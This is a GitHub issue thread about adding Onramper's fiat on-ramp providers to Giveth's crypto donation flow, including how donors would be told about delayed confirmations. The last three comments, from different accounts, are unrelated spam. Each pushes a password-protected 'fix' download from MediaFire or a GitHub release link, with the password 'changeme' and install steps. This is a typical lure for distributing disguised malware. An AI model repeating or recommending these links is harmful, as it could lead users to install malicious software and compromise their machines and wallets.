### ISSUE TITLE
Onramper Integration

### ISSUE THREAD

**Issue by mateodaza** [Giveth/giveth-dapps-v2#1720]
With this tool we have access to these on ramp solutions in the same plugin

Currently, the integrated onramps are:
[Moonpay](https://moonpay.io/)
[Wyre](https://sendwyre.com/)
[Xanpool](https://xanpool.com/)
[Mercuryo](https://mercuryo.io/)
[Coinify](https://www.coinify.com/)
[Indacoin](https://www.indacoin.com/)
[Utorg](https://utorg.pro/)
[Transak](https://transak.com/)
[Itez](https://itez.com/)
[Sardine (live Soon)](https://www.sardine.ai/)
[BTCDirect (live Soon)](https://btcdirect.eu/en-gb/)

The idea is to bring this option to the donation flow where users are able to buy crypto (on ethereum mainnet and gnosis) directly to the project's wallet

We already own an API key with 0 fees thanks to Rigs and Leeroy who we got to meet in Bogota last devcon. Shoutout to them!

- [Docs](https://docs.onramper.com/)
- [Dashboard](https://dashboard.onramper.com/)

**Comment by mateodaza** [comment]
We'll have this option to make a donation through fiat using onramper with this button
<img width="1430" alt="image" src="https://user-images.githubusercontent.com/18689480/204416504-fc990c14-fea5-45d7-bf4f-0586410a1815.png">

It will display a webview from on ramper like this, the next steps depends on which option the user picks (we can't control this)
<img width="1425" alt="image" src="https://user-images.githubusercontent.com/18689480/204416546-6af0c841-ffdf-4ccc-9c23-47606319470f.png">

@mosaeedi @Tosinolawale I'd love your suggestions for this flow, particularly we have to make sure we let the donors know these important details
-  Donations will only be confirmed after a while they have been sent, time depends on the chosen onramp 
- The donation will look like a regular crypto donation with the difference that the wallet source is onramper, not donor's wallet
- We won't show a confirmation as we are not able to know when the transaction was fulfilled or cancelled

If you guys can help me figure this out I'd appreciate it a lot, we can also have a meeting so it's more clear :)

**Comment by Tosinolawale** [comment]
> We'll have this option to make a donation through fiat using onramper with this button <img alt="image" width="1430" src="https://user-images.githubusercontent.com/18689480/204416504-fc990c14-fea5-45d7-bf4f-0586410a1815.png">
> 
> It will display a webview from on ramper like this, the next steps depends on which option the user picks (we can't control this) <img alt="image" width="1425" src="https://user-images.githubusercontent.com/18689480/204416546-6af0c841-ffdf-4ccc-9c23-47606319470f.png">
> 
> @mosaeedi @Tosinolawale I'd love your suggestions for this flow, particularly we have to make sure we let the donors know these important details
> 
> * Donations will only be confirmed after a while they have been sent, time depends on the chosen onramp
> * The donation will look like a regular crypto donation with the difference that the wallet source is onramper, not donor's wallet
> * We won't show a confirmation as we are not able to know when the transaction was fulfilled or cancelled
> 
> I truly believe the best way to keep a clean flow is to let know the donor all of this before sending them to the webview (this can help for sdg donorbox on giveth's project, I referenced [the issue about this here](https://github.com/giveth/giveth-dapps-v2/issues/1719) )
> 
> If you guys can help me figure this out I'd appreciate it a lot, we can also have a meeting so it's more clear :)

Can I get back to you on this tomorrow? Will that be okay?

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
